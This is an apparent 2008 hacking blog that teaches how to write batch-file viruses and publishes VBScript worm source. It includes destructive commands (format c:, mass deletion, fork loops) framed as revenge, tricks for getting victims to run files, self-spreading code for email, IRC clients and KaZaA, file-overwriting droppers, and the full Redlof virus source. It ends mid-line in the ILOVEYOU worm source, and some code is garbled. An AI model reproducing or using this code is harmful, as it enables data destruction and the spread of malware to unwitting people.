Friday, July 11, 2008
How to make batch into a notepad
 How to build a simple .bat virus
Index
1. Tools
2. What makes a virus a virus
3. Making your first batch file
4. Making a batch virus
5. Destructive commands
6. Most common tricks used to make someone open the file
7.By, Robby23, 24 Guns, Harry, SLAUGHTER, blu3m4n, BuRP QuakE
1. Tools
To make a batch program you will need a text program (ex. Word,notepad,wordpad etc…) A keyboard if you don’t have one you can use the ON-screen keyboard
To get to the on-screen keyboard start>all programs>accessories>accessibility
2. What makes a virus a virus
When people think of a virus they think of a computer virus but the word virus came from a virus that’s in your body. They also think a virus is meant to delete or destroy things. They normally do but a virus is called a virus because, it copies itself. Like a virus in your body it copies it self to other cells cause it can’t live with out a host. Same with a computer virus with out a file or a program a virus can’t be made.
So all a computer virus is: a program that copies it self ,but some people put destructive code in it.
3. Making a Batch file
I’m going to use notepad you can use what ever you want
We are also going to make a “Hello World� Application that is the first program you make in any language
When making a batch file you are always going to use this line first
@echo off
You can turn it on if you like. All that does is telling the program not to tell its location. If you turn it on then the program will tell were it is at on the computer.
You can experiment a little if you want.
Now we are going to make it say Hello World
To do this we need a echo command which looks like this
echo
This tells the program to write something since we want it to say Hello World we are going to type Hello World next to echo to make it look like this
echo Hello World
so at this point you should have
@echo off
echo Hello World
now go to file save and name it test.bat ( you can name it whatever you want as long as it has .bat at the end.)
Save it to the desktop so you can get to it faster.
Then run it
You should of have a black box open and close really fast
To fix this we need a pause command and we will also need a goto command
The goto command is the most important command
If you don't know the goto command tell it were to go to next.
since we need a pause command we want it to go to pause so we need to write goto pause like this
goto pause
now u should have
@echo off
echo Hello World
goto pause
now we need a subsection name pause
you make a sub section by putting a : by the first word like this
:start
or
:end
,but we said go to pause so we need one name pause like this
:pause
then under that we are goin to write pause
:pause
pause
this just makes it were it will keep the box open till you press a key
Optional
At the end you can put a exit at the end of pause were the goto command should go ,but you don't have to.
save at run it now.You should be able to read your text now
4. Making a Batch file into a virus
This is a lot easier then some people think.
To make a virus you just need the copy command which looks like this
copy
so lets make a new one by reading section 3 you should know you need the @echo off
@echo off
copy
allright we are going to name this file first
and we are going to make it copy itself to C:\WINDOWS just because no one looks in their
this is what it looks like (i will explain it)
@echo off
copy first C:\WINDOWS
copy-tells it to copy
first-is just the name of the file we want to copy
C:\WINDOWS- is the place you want to copy to
that is a virus
5. Destructive commands
If you get pissed at someone you might want to send him something to mess with him. Here are some commands to add to the virus.
del -this del files
del file name
del (.txt*)
the (.txt*) would delete all txt files on the computer the * at the end just means all instead of a file called .txt
deltree- this deletes the whole folder
you can remember it like this
Think of a tree if you type del you are only deleting a part of the tree ,but if you type deltree you are deleting the whole tree
format- this deletes everything
format c:
this deletes everything in the c drive
open
this is just fun to use to scare some one but not do damage to something
open name of file
like to open notepad type
open notepad
to open microsoft paint type
open mspaint
just put ta crap load in their
also the next one that can be very usefull is looping
this will make the file repeat it self til it is shut off
say your first sub section is called start
you would just make the goto command to go to start like
@echo off
:start
start notepad
goto start
that will open notepad over and over and if they don't close it it can crash their computer
to open the command window you have to use var. like %% (not going to explain var. it would be confusing)
@echo off
:whatever
start %0
goto whatever
this will open the black box over and over
6. Most command tricks
people will put it in a folder with a couple read me doc. and call it a game
people will say check this out it is so cool
people will say check out this hack or cheat i found for this game
to check if the are good do this
tell them to put it in a zip folder and send it
unzip and right click on the program(don't open it)
and press edit
that will show the source code and if you see something you don't like then delete it
  Index
1. Tools
2. What makes a virus a virus
3. Making your first batch file
4. Making a batch virus
5. Destructive commands
6. Most common tricks used to make someone open the file
7.By, Robby23, 24 Guns, Harry, SLAUGHTER, blu3m4n, BuRP QuakE
1. Tools
To make a batch program you will need a text program (ex. Word,notepad,wordpad etc…) A keyboard if you don’t have one you can use the ON-screen keyboard
To get to the on-screen keyboard start>all programs>accessories>accessibility
2. What makes a virus a virus
When people think of a virus they think of a computer virus but the word virus came from a virus that’s in your body. They also think a virus is meant to delete or destroy things. They normally do but a virus is called a virus because, it copies itself. Like a virus in your body it copies it self to other cells cause it can’t live with out a host. Same with a computer virus with out a file or a program a virus can’t be made.
So all a computer virus is: a program that copies it self ,but some people put destructive code in it.
3. Making a Batch file
I’m going to use notepad you can use what ever you want
We are also going to make a “Hello World� Application that is the first program you make in any language
When making a batch file you are always going to use this line first
@echo off
You can turn it on if you like. All that does is telling the program not to tell its location. If you turn it on then the program will tell were it is at on the computer.
You can experiment a little if you want.
Now we are going to make it say Hello World
To do this we need a echo command which looks like this
echo
This tells the program to write something since we want it to say Hello World we are going to type Hello World next to echo to make it look like this
echo Hello World
so at this point you should have
@echo off
echo Hello World
now go to file save and name it test.bat ( you can name it whatever you want as long as it has .bat at the end.)
Save it to the desktop so you can get to it faster.
Then run it
You should of have a black box open and close really fast
To fix this we need a pause command and we will also need a goto command
The goto command is the most important command
If you don't know the goto command tell it were to go to next.
since we need a pause command we want it to go to pause so we need to write goto pause like this
goto pause
now u should have
@echo off
echo Hello World
goto pause
now we need a subsection name pause
you make a sub section by putting a : by the first word like this
:start
or
:end
,but we said go to pause so we need one name pause like this
:pause
then under that we are goin to write pause
:pause
pause
this just makes it were it will keep the box open till you press a key
Optional
At the end you can put a exit at the end of pause were the goto command should go ,but you don't have to.
save at run it now.You should be able to read your text now
4. Making a Batch file into a virus
This is a lot easier then some people think.
To make a virus you just need the copy command which looks like this
copy
so lets make a new one by reading section 3 you should know you need the @echo off
@echo off
copy
allright we are going to name this file first
and we are going to make it copy itself to C:\WINDOWS just because no one looks in their
this is what it looks like (i will explain it)
@echo off
copy first C:\WINDOWS
copy-tells it to copy
first-is just the name of the file we want to copy
C:\WINDOWS- is the place you want to copy to
that is a virus
5. Destructive commands
If you get pissed at someone you might want to send him something to mess with him. Here are some commands to add to the virus.
del -this del files
del file name
del (.txt*)
the (.txt*) would delete all txt files on the computer the * at the end just means all instead of a file called .txt
deltree- this deletes the whole folder
you can remember it like this
Think of a tree if you type del you are only deleting a part of the tree ,but if you type deltree you are deleting the whole tree
format- this deletes everything
format c:
this deletes everything in the c drive
open
this is just fun to use to scare some one but not do damage to something
open name of file
like to open notepad type
open notepad
to open microsoft paint type
open mspaint
just put ta crap load in their
also the next one that can be very usefull is looping
this will make the file repeat it self til it is shut off
say your first sub section is called start
you would just make the goto command to go to start like
@echo off
:start
start notepad
goto start
that will open notepad over and over and if they don't close it it can crash their computer
to open the command window you have to use var. like %% (not going to explain var. it would be confusing)
@echo off
:whatever
start %0
goto whatever
this will open the black box over and over
6. Most command tricks
people will put it in a folder with a couple read me doc. and call it a game
people will say check this out it is so cool
people will say check out this hack or cheat i found for this game
to check if the are good do this
tell them to put it in a zip folder and send it
unzip and right click on the program(don't open it)
and press edit
that will show the source code and if you see something you don't like then delete it
Sunday, May 18, 2008
Spreading Virus (source code)
 1) eMail spreading
First you'll find the eMail-spreading-source:
The Virus searchs for every email adress in the addressbook. Then sending itself to these addresses. It's really easy, I think.
2) mIRC spreading
The source first:
First The virus copies itself to C:\mirc\attachment.vbs Then it canges the mIRC-script.ini file. So every user in the same chatroom gets an infect file.
3) pIRCh spreading
Source:
It's the same as mIRC spreading. First the worm made a copy of itself in the pIRCh direction (C:\pirch98), then changes the event.ini file, so every user get an infect file.
4) vIRC spreading
VBS vIRC source:
It's a really short code. First you need a copy of the virus, than change a registry key. That's all...
5) KaZaA spreading
Source:
You make a copy of the virus in the C:\Kazaa-direction. Then make a registry-key. Every file in the direction (here it is "C:\kazaa\") other user can download. I think, you will understand it.
6) LNK dropping
Dropping means, that every LNK file opens the virus. Look at the code:
First the virus makes a copy of itself to C:\vbs.vbs Then it generates a LNK file, which opens the C:\vbs.vbs-file. Then the virus makes a batch file, which copies the LNK-file to every LNK file it can find.
7) BAT dropping
Source first:
First the virus copies itself to C:\vbs.vbs. Than it generates a batch-file (C:\bat.bat) which opens the virus-copy. Than te virus generates a second batch file, which copies the first one to every batch-files it can find.
8) PIF dropping
PIF files open DOS-files. Yes, but VBS is a windows file?? what to do?
Source:
First the virus copies itself to C:\vbs.vbs. Than it generates a batch file, which opens the virus. Than it generates a PIF file, which opens the batch file. You can see, that the code should generates a LNK, but VBS "know" that BAT is a DOS file, so it makes a DOS-ShourtCut, and that's PIF. Ok, go on, the vbs file generates a second BAT file, which copies the PIF to every PIF-file, it can find.
Before starting writing this article, i don't really like to program in VBS, because I thought, it's a ScriptKiddy language. But after a while I liked it more and more, because Im able to make really nice things like file-dropping or other stuff. I hope U also enjoyed reading this tutorial about VisualBasicScript.
  First you'll find the eMail-spreading-source:
| Dim x on error resume next Set fso ="Scripting.FileSystem.Object" Set so=CreateObject(fso) Set ol=CreateObject("Outlook.Application") Set out= WScript.CreateObject("Outlook.Application") Set mapi = out.GetNameSpace("MAPI") Set a = mapi.AddressLists(1) For x=1 To a.AddressEntries.Count Set Mail=ol.CreateItem(0) Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x) Mail.Subject="Subject" Mail.Body="Body" Mail.Attachments.Add Wscript.ScriptFullName Mail.Send Next ol.Quit | 
The Virus searchs for every email adress in the addressbook. Then sending itself to these addresses. It's really easy, I think.
2) mIRC spreading
The source first:
| Dim mirc set fso=CreateObject("Scripting.FileSystemObject") set mirc=fso.CreateTextFile("C:\mirc\script.ini") fso.CopyFile Wscript.ScriptFullName, "C:\mirc\attachment.vbs", True mirc.WriteLine "[script]" mirc.WriteLine "n0=on 1:join:*.*: { if ( $nick !=$me ) {halt} /dcc send $nick C:\mirc\attachment.vbs } mirc.Close | 
First The virus copies itself to C:\mirc\attachment.vbs Then it canges the mIRC-script.ini file. So every user in the same chatroom gets an infect file.
3) pIRCh spreading
Source:
| Dim pirch set fso=CreateObject("Scripting.FileSystemObject") set mirc=fso.CreateTextFile("C:pirch98events.ini") fso.CopyFile Wscript.ScriptFullName, "C:mircattachment.vbs", True pirch.WriteLine "[Levels]"); pirch.WriteLine "Enabled=1"); pirch.WriteLine "Count=6"); pirch.WriteLine "Level1=000-Unknows" pirch.WriteLine "000-UnknowsEnabled=1" pirch.WriteLine "Level2=100-Level 100" pirch.WriteLine "100-Level 100Enabled=1" pirch.WriteLine "Level3=200-Level 200" pirch.WriteLine "200-Level 200Enabled=1" pirch.WriteLine "Level4=300-Level 300" pirch.WriteLine "300-Level 300Enabled=1" pirch.WriteLine "Level5=400-Level 400" pirch.WriteLine "400-Level 400Enabled=1" pirch.WriteLine "Level6=500-Level 500" pirch.WriteLine "500-Level 500Enabled=1" pirch.WriteLine "[000-Unknowns]" pirch.WriteLine "User1=*!*@*" pirch.WriteLine "UserCount=1" pirch.WriteLine "Events1=ON JOIN:#: /dcc send $nick C:\Pirch98\attachement.vbs" pirch.WriteLine "EventCount=1" pirch.WriteLine "[100-Level 100]" pirch.WriteLine "UserCount=0" pirch.WriteLine "EventCount=0" pirch.WriteLine "[200-Level 200]" pirch.WriteLine "UserCount=0" pirch.WriteLine "EventCount=0" pirch.WriteLine "[300-Level 300]" pirch.WriteLine "UserCount=0" pirch.WriteLine "EventCount=0" pirch.WriteLine "[400-Level 400]" pirch.WriteLine "UserCount=0" pirch.WriteLine "EventCount=0" pirch.WriteLine "[500-Level 500]" pirch.WriteLine "UserCount=0" pirch.WriteLine "EventCount=0" pirch.Close | 
It's the same as mIRC spreading. First the worm made a copy of itself in the pIRCh direction (C:\pirch98), then changes the event.ini file, so every user get an infect file.
4) vIRC spreading
VBS vIRC source:
| set fso=CreateObject("Scripting.FileSystemObject") fso.CopyFile Wscript.ScriptFullName, "C:\Virc\attachment.vbs", True set shell=CreateObject("WScript.Shell") shell RegWrite "HKEY_CURRENT_USER\.Default\Software\MeGaLiTh Software\Visual IRC 96\Events\Event17", "dcc send $nick C:\Virc\attachment.vbs" | 
It's a really short code. First you need a copy of the virus, than change a registry key. That's all...
5) KaZaA spreading
Source:
| set fso=CreateObject("Scripting.FileSystemObject") fso.CopyFile Wscript.ScriptFullName, "C:\Kazaa\Nirvana - You Know You Are Right.vbs", True set shell=CreateObject("WScript.Shell") shell.RegWrite "HKLM\\Software\\KaZaA\\Transfer\\DlDir0", "C:\Kazaa"); | 
You make a copy of the virus in the C:\Kazaa-direction. Then make a registry-key. Every file in the direction (here it is "C:\kazaa\") other user can download. I think, you will understand it.
6) LNK dropping
Dropping means, that every LNK file opens the virus. Look at the code:
| Dim shell, msc, batch, fso set fso=CreateObject("Scripting.FileSystemObject") fso.CopyFile Wscript.ScriptFullName, "C:\vbs.vbs", True set shell=wscript.createobject("wscript.shell") set msc=shell.CreateShortCut("C:\vbs.lnk") msc.TargetPath=shell.ExpandEnvironment("C:\vbs.vbs") msc.WindowStyle=4 msc.Save set batch=fso.CreateTextFile("C:\lnk.bat") batch.WriteLine "cls" batch.WriteLine "@echo off" batch.WriteLine "for %%a in (*.lnk ..\*.lnk \*.lnk %path%\*.lnk %tmp%\*.lnk %temp%\*.lnk %windir%\*.lnk) do copy C:\vbs.lnk %%a" batch.Close shell.Run "C:\lnk.bat" | 
First the virus makes a copy of itself to C:\vbs.vbs Then it generates a LNK file, which opens the C:\vbs.vbs-file. Then the virus makes a batch file, which copies the LNK-file to every LNK file it can find.
7) BAT dropping
Source first:
| Dim shell, batcha, batchb, fso set fso=CreateObject("Scripting.FileSystemObject") fso.CopyFile Wscript.ScriptFullName, "C:\vbs.vbs", True set batcha=fso.CreateTextFile("C:\bat.bat") batcha.WriteLine "cls" batcha.WriteLine "@echo off" batcha.WriteLine "cscript C:\vbs.vbs" batcha.Close set batchb=CreateTextFile("C:\bata.bat") batchb.WriteLine "cls" batchb.WriteLine "@echo off" batchb.WriteLine "for %%a in (*.bat ..\*.bat \*.bat %path%\*.bat %tmp%\*.bat %temp%\*.bat %windir%\*.bat) do copy C:\bat.bat %%a" batchb.Close shell.Run "C:\lnk.bat" | 
First the virus copies itself to C:\vbs.vbs. Than it generates a batch-file (C:\bat.bat) which opens the virus-copy. Than te virus generates a second batch file, which copies the first one to every batch-files it can find.
8) PIF dropping
PIF files open DOS-files. Yes, but VBS is a windows file?? what to do?
Source:
| Dim shell, msc, batch, fso, batchb set fso=CreateObject("Scripting.FileSystemObject") fso.CopyFile Wscript.ScriptFullName, "C:\vbs.vbs", True set batch=CreateTextFile("C:\bat.bat") batch.WriteLine "cls" batch.WriteLine "@echo off" batch.WriteLine "cscript C:\vbs.vbs" batch.Close set shell=wscript.createobject("wscript.shell") set msc=shell.CreateShortCut("C:\pif.lnk") msc.TargetPath=shell.ExpandEnvironment("C:\bat.bat") msc.WindowStyle=4 msc.Save set batchb=CreaateTextFile("C:\pif.bat") batchb.WriteLine "cls" batchb.WriteLine "@echo off" batchb.WriteLine "for %%a in (*.pif ..\*.pif \*.pif %path%\*.pif %tmp%\*.pif %temp%\*.pif %windir%\*.pif) do copy C:\pif.pif %%a" batchb.Close shell.Run "C:\pif.bat" | 
First the virus copies itself to C:\vbs.vbs. Than it generates a batch file, which opens the virus. Than it generates a PIF file, which opens the batch file. You can see, that the code should generates a LNK, but VBS "know" that BAT is a DOS file, so it makes a DOS-ShourtCut, and that's PIF. Ok, go on, the vbs file generates a second BAT file, which copies the PIF to every PIF-file, it can find.
Before starting writing this article, i don't really like to program in VBS, because I thought, it's a ScriptKiddy language. But after a while I liked it more and more, because Im able to make really nice things like file-dropping or other stuff. I hope U also enjoyed reading this tutorial about VisualBasicScript.
Redlof VBS>Redlof (source code)
Redlof is polymorphic virus that embeds itself without any attachment to every e-mail sent from the infected system. It executes when an infected email message is viewed.
NAME: Redlof
ALIAS: VBS.Redlof, VBS/Redlof
ALIAS: VBS/Redolf
VARIANT: Redlof.A
VARIANT: VBS/Redolf.A
VBS/Redlof.A@m executes directly from an infected message by using a security vulnerbility in Internet Exlorer known as Microsoft VM ActiveX Control Vulnerability. More information about the vulnerability and a fix is available from Microsoft: http://www.microsoft.com/technet/security/bulletin/ms00-075.asp
When the virus executes, it infects a file "web\Folders.htt" at the Windows installation directory which causes that the virus activates when any directory is opened using the Active Desktop's web folder feature.
The virus also infects files with extensions "htm", "html", "asp", "php", "jsp", "htt" or "vbs".
Redlof drops the following infected files:
\Program Files\Common Files\Microsoft Shared\Stationery\blank.html
\Windows\System\Kernel32.dll
\Windows\web\kjwall.gif
\Windows\system32\desktop.ini
"blank.html" is used to replace the default stationaries for both Outlook and Outlook Express via registry causing that the every message sent from an infected system will carry the virus.
The "Kernel32.dll" is also set to registry so that it will be executed on the system restart:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Kernel32
  
  NAME: Redlof
ALIAS: VBS.Redlof, VBS/Redlof
ALIAS: VBS/Redolf
VARIANT: Redlof.A
VARIANT: VBS/Redolf.A
VBS/Redlof.A@m executes directly from an infected message by using a security vulnerbility in Internet Exlorer known as Microsoft VM ActiveX Control Vulnerability. More information about the vulnerability and a fix is available from Microsoft: http://www.microsoft.com/technet/security/bulletin/ms00-075.asp
When the virus executes, it infects a file "web\Folders.htt" at the Windows installation directory which causes that the virus activates when any directory is opened using the Active Desktop's web folder feature.
The virus also infects files with extensions "htm", "html", "asp", "php", "jsp", "htt" or "vbs".
Redlof drops the following infected files:
\Program Files\Common Files\Microsoft Shared\Stationery\blank.html
\Windows\System\Kernel32.dll
\Windows\web\kjwall.gif
\Windows\system32\desktop.ini
"blank.html" is used to replace the default stationaries for both Outlook and Outlook Express via registry causing that the every message sent from an infected system will carry the virus.
The "Kernel32.dll" is also set to registry so that it will be executed on the system restart:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Kernel32
| Dim InWhere,HtmlText,VbsText,DegreeSign,AppleObject,FSO,WsShell,WinPath,SubE,FinalyDisk Sub KJ_start() KJSetDim() KJCreateMilieu() KJLikeIt() KJCreateMail() KJPropagate() End Sub Function KJAppendTo(FilePath,TypeStr) On Error Resume Next Set ReadTemp = FSO.OpenTextFile(FilePath,1) TmpStr = ReadTemp.ReadAll If Instr(TmpStr,"KJ_start()") <> 0 Or Len(TmpStr) < 1 Then ReadTemp.Close Exit Function End If If TypeStr = "htt" Then ReadTemp.Close Set FileTemp = FSO.OpenTextFile(FilePath,2) FileTemp.Write "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & TmpStr & vbCrLf & HtmlText FileTemp.Close Set FAttrib = FSO.GetFile(FilePath) FAttrib.attributes = 34 Else ReadTemp.Close Set FileTemp = FSO.OpenTextFile(FilePath,8) If TypeStr = "html" Then FileTemp.Write vbCrLf & "<" & "HTML>" & vbCrLf & "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & HtmlText ElseIf TypeStr = "vbs" Then FileTemp.Write vbCrLf & VbsText End If FileTemp.Close End If End Function Function KJChangeSub(CurrentString,LastIndexChar) If LastIndexChar = 0 Then If Left(LCase(CurrentString),1) =< LCase("c") Then KJChangeSub = FinalyDisk & ":\" SubE = 0 Else KJChangeSub = Chr(Asc(Left(LCase(CurrentString),1)) - 1) & ":" SubE = 0 End If Else KJChangeSub = Mid(CurrentString,1,LastIndexChar) End If End Function Function KJCreateMail() On Error Resume Next If InWhere = "html" Then Exit Function End If ShareFile = Left(WinPath,3) & "Program FilesCommon FilesMicrosoft SharedStationeryblank.htm" If (FSO.FileExists(ShareFile)) Then Call KJAppendTo(ShareFile,"html") Else Set FileTemp = FSO.OpenTextFile(ShareFile,2,true) FileTemp.Write "<" & "HTML>" & vbCrLf & "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & HtmlText FileTemp.Close End If DefaultId = WsShell.RegRead("HKEY_CURRENT_USERIdentitiesDefault User ID") OutLookVersion = WsShell.RegRead("HKEY_LOCAL_MACHINESoftwareMicrosoftOutlook ExpressMediaVer") WsShell.RegWrite "HKEY_CURRENT_USERIdentities"&DefaultId&"SoftwareMicrosoftOutlook Express"& Left(OutLookVersion,1) &".0MailCompose Use Stationery",1,"REG_DWORD" Call KJMailReg("HKEY_CURRENT_USERIdentities"&DefaultId&"SoftwareMicrosoftOutlook Express"& Left(OutLookVersion,1) &".0MailStationery Name",ShareFile) Call KJMailReg("HKEY_CURRENT_USERIdentities"&DefaultId&"SoftwareMicrosoftOutlook Express"& Left(OutLookVersion,1) &".0MailWide Stationery Name",ShareFile) WsShell.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftOffice9.0OutlookOptionsMailEditorPreference",131072,"REG_DWORD" Call KJMailReg("HKEY_CURRENT_USERSoftwareMicrosoftWindows Messaging SubsystemProfilesMicrosoft Outlook Internet Settings0a0d020000000000c000000000000046001e0360","blank") Call KJMailReg("HKEY_CURRENT_USERSoftwareMicrosoftWindows NTCurrentVersionWindows Messaging SubsystemProfilesMicrosoft Outlook Internet Settings0a0d020000000000c000000000000046001e0360","blank") WsShell.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftOffice10.0OutlookOptionsMailEditorPreference",131072,"REG_DWORD" Call KJMailReg("HKEY_CURRENT_USERSoftwareMicrosoftOffice10.0CommonMailSettingsNewStationery","blank") KJummageFolder(Left(WinPath,3) & "Program FilesCommon FilesMicrosoft SharedStationery") End Function Function KJCreateMilieu() On Error Resume Next TempPath = "" If Not(FSO.FileExists(WinPath & "WScript.exe")) Then TempPath = "system32" End If If TempPath = "system32" Then StartUpFile = WinPath & "SYSTEMKernel32.dll" Else StartUpFile = WinPath & "SYSTEMKernel.dll" End If WsShell.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunKernel32",StartUpFile FSO.CopyFile WinPath & "webkjwall.gif",WinPath & "webFolder.htt" FSO.CopyFile WinPath & "system32kjwall.gif",WinPath & "system32desktop.ini" Call KJAppendTo(WinPath & "webFolder.htt","htt") WsShell.RegWrite "HKEY_CLASSES_ROOT.dll","dllfile" WsShell.RegWrite "HKEY_CLASSES_ROOT.dllContent Type","application/x-msdownload" WsShell.RegWrite "HKEY_CLASSES_ROOTdllfileDefaultIcon",WsShell.RegRead("HKEY_CLASSES_ROOTvxdfileDefaultIcon") WsShell.RegWrite "HKEY_CLASSES_ROOTdllfileScriptEngine","VBScript" WsShell.RegWrite "HKEY_CLASSES_ROOTdllFileShellOpenCommand",WinPath & TempPath & "WScript.exe ""%1"" %*" WsShell.RegWrite "HKEY_CLASSES_ROOTdllFileShellExPropertySheetHandlersWSHProps","{60254CA5-953B-11CF-8C96-00AA00B8708C}" WsShell.RegWrite "HKEY_CLASSES_ROOTdllFileScriptHostEncode","{85131631-480C-11D2-B1F9-00C04F86C324}" Set FileTemp = FSO.OpenTextFile(StartUpFile,2,true) FileTemp.Write VbsText FileTemp.Close End Function Function KJLikeIt() If InWhere <> "html" Then Exit Function End If ThisLocation = document.location If Left(ThisLocation, 4) = "file" Then ThisLocation = Mid(ThisLocation,9) If FSO.GetExtensionName(ThisLocation) <> "" then ThisLocation = Left(ThisLocation,Len(ThisLocation) - Len(FSO.GetFileName(ThisLocation))) End If If Len(ThisLocation) > 3 Then ThisLocation = ThisLocation & "" End If KJummageFolder(ThisLocation) End If End Function Function KJMailReg(RegStr,FileName) On Error Resume Next RegTempStr = WsShell.RegRead(RegStr) If RegTempStr = "" Then WsShell.RegWrite RegStr,FileName End If End Function Function KJOboSub(CurrentString) SubE = 0 TestOut = 0 Do While True TestOut = TestOut + 1 If TestOut > 28 Then CurrentString = FinalyDisk & ":" Exit Do End If On Error Resume Next Set ThisFolder = FSO.GetFolder(CurrentString) Set DicSub = CreateObject("Scripting.Dictionary") Set Folders = ThisFolder.SubFolders FolderCount = 0 For Each TempFolder in Folders FolderCount = FolderCount + 1 DicSub.add FolderCount, TempFolder.Name Next If DicSub.Count = 0 Then LastIndexChar = InstrRev(CurrentString,"",Len(CurrentString)-1) SubString = Mid(CurrentString,LastIndexChar+1,Len(CurrentString)-LastIndexChar-1) CurrentString = KJChangeSub(CurrentString,LastIndexChar) SubE = 1 Else If SubE = 0 Then CurrentString = CurrentString & DicSub.Item(1) & "" Exit Do Else j = 0 For j = 1 To FolderCount If LCase(SubString) = LCase(DicSub.Item(j)) Then If j < FolderCount Then CurrentString = CurrentString & DicSub.Item(j+1) & "" Exit Do End If End If Next LastIndexChar = InstrRev(CurrentString,"",Len(CurrentString)-1) SubString = Mid(CurrentString,LastIndexChar+1,Len(CurrentString)-LastIndexChar-1) CurrentString = KJChangeSub(CurrentString,LastIndexChar) End If End If Loop KJOboSub = CurrentString End Function Function KJPropagate() On Error Resume Next RegPathValue = "HKEY_LOCAL_MACHINESoftwareMicrosoftOutlook ExpressDegree" DiskDegree = WsShell.RegRead(RegPathValue) If DiskDegree = "" Then DiskDegree = FinalyDisk & ":" End If For i=1 to 5 DiskDegree = KJOboSub(DiskDegree) KJummageFolder(DiskDegree) Next WsShell.RegWrite RegPathValue,DiskDegree End Function Function KJummageFolder(PathName) On Error Resume Next Set FolderName = FSO.GetFolder(PathName) Set ThisFiles = FolderName.Files HttExists = 0 For Each ThisFile In ThisFiles FileExt = UCase(FSO.GetExtensionName(ThisFile.Path)) If FileExt = "HTM" Or FileExt = "HTML" Or FileExt = "ASP" Or FileExt = "PHP" Or FileExt = "JSP" Then Call KJAppendTo(ThisFile.Path,"html") ElseIf FileExt = "VBS" Then Call KJAppendTo(ThisFile.Path,"vbs") ElseIf FileExt = "HTT" Then HttExists = 1 End If Next If (UCase(PathName) = UCase(WinPath & "Desktop")) Or (UCase(PathName) = UCase(WinPath & "Desktop"))Then HttExists = 1 End If If HttExists = 0 Then FSO.CopyFile WinPath & "system32desktop.ini",PathName FSO.CopyFile WinPath & "webFolder.htt",PathName End If End Function Function KJSetDim() On Error Resume Next Err.Clear TestIt = WScript.ScriptFullname If Err Then InWhere = "html" Else InWhere = "vbs" End If If InWhere = "vbs" Then Set FSO = CreateObject("Scripting.FileSystemObject") Set WsShell = CreateObject("WScript.Shell") Else Set AppleObject = document.applets("KJ_guest") AppleObject.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}") AppleObject.createInstance() Set WsShell = AppleObject.GetObject() AppleObject.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}") AppleObject.createInstance() Set FSO = AppleObject.GetObject() End If Set DiskObject = FSO.Drives For Each DiskTemp In DiskObject If DiskTemp.DriveType <> 2 And DiskTemp.DriveType <> 1 Then Exit For End If FinalyDisk = DiskTemp.DriveLetter Next Dim OtherArr(3) Randomize For i=0 To 3 OtherArr(i) = Int((9 * Rnd)) Next TempString = "" For i=1 To Len(ThisText) TempNum = Asc(Mid(ThisText,i,1)) If TempNum = 13 Then TempNum = 28 ElseIf TempNum = 10 Then TempNum = 29 End If TempChar = Chr(TempNum - OtherArr(i Mod 4)) If TempChar = Chr(34) Then TempChar = Chr(18) End If TempString = TempString & TempChar Next UnLockStr = "Execute(""Dim KeyArr(3),ThisText""&vbCrLf&""KeyArr(0) = " & OtherArr(0) & """&vbCrLf&""KeyArr(1) = " & OtherArr(1) & """&vbCrLf&""KeyArr(2) = " & OtherArr(2) & """&vbCrLf&""KeyArr(3) = " & OtherArr(3) & """&vbCrLf&""For i=1 To Len(ExeString)""&vbCrLf&""TempNum = Asc(Mid(ExeString,i,1))""&vbCrLf&""If TempNum = 18 Then""&vbCrLf&""TempNum = 34""&vbCrLf&""End If""&vbCrLf&""TempChar = Chr(TempNum + KeyArr(i Mod 4))""&vbCrLf&""If TempChar = Chr(28) Then""&vbCrLf&""TempChar = vbCr""&vbCrLf&""ElseIf TempChar = Chr(29) Then""&vbCrLf&""TempChar = vbLf""&vbCrLf&""End If""&vbCrLf&""ThisText = ThisText & TempChar""&vbCrLf&""Next"")" & vbCrLf & "Execute(ThisText)" ThisText = "ExeString = """ & TempString & """" HtmlText ="<" & "script language=vbscript>" & vbCrLf & "document.write " & """" & "<" & "div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'>" & "<""&""" & "APPLET NAME=KJ""&""_guest HEIGHT=0 WIDTH=0 code=com.ms.""&""activeX.Active""&""XComponent>" & "<" & "/APPLET>" & "<" & "/div>""" & vbCrLf & "<" & "/script>" & vbCrLf & "<" & "script language=vbscript>" & vbCrLf & ThisText & vbCrLf & UnLockStr & vbCrLf & "<" & "/script>" & vbCrLf & "<" & "/BODY>" & vbCrLf & "<" & "/HTML>" VbsText = ThisText & vbCrLf & UnLockStr & vbCrLf & "KJ_start()" WinPath = FSO.GetSpecialFolder(0) & "" If (FSO.FileExists(WinPath & "webFolder.htt")) Then FSO.CopyFile WinPath & "webFolder.htt",WinPath & "webkjwall.gif" End If If (FSO.FileExists(WinPath & "system32desktop.ini")) Then FSO.CopyFile WinPath & "system32desktop.ini",WinPath & "system32kjwall.gif" End If End Function | 
Friday, May 9, 2008
I Love You Virus - source code
The ILOVEYOU worm, also known as VBS/Loveletter and Love Bug worm, is a computer worm written in VBScript.Description
The worm arrived in e-mail boxes on May 4, 2000, with the simple subject of "ILOVEYOU" and an attachment "LOVE-LETTER-FOR-YOU.TXT.vbs".
Two aspects of the worm made it effective:
* It relied on social engineering to entice users to open the e-mail and ensure its continued propagation.
* It employed a mechanism — VBScripts — that, while not entirely novel, had not been exploited to such a degree previously to direct attention to their potential, reducing the layers of protection that would have to be navigated for success.
here is the source code of one of the most famous virus the hits cyberspace
rem barok -loveletter(vbe)
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group /
Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d ow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Micros oft\Windows Scripting
Host\Settings\Timeout")
if (rr>=1) then
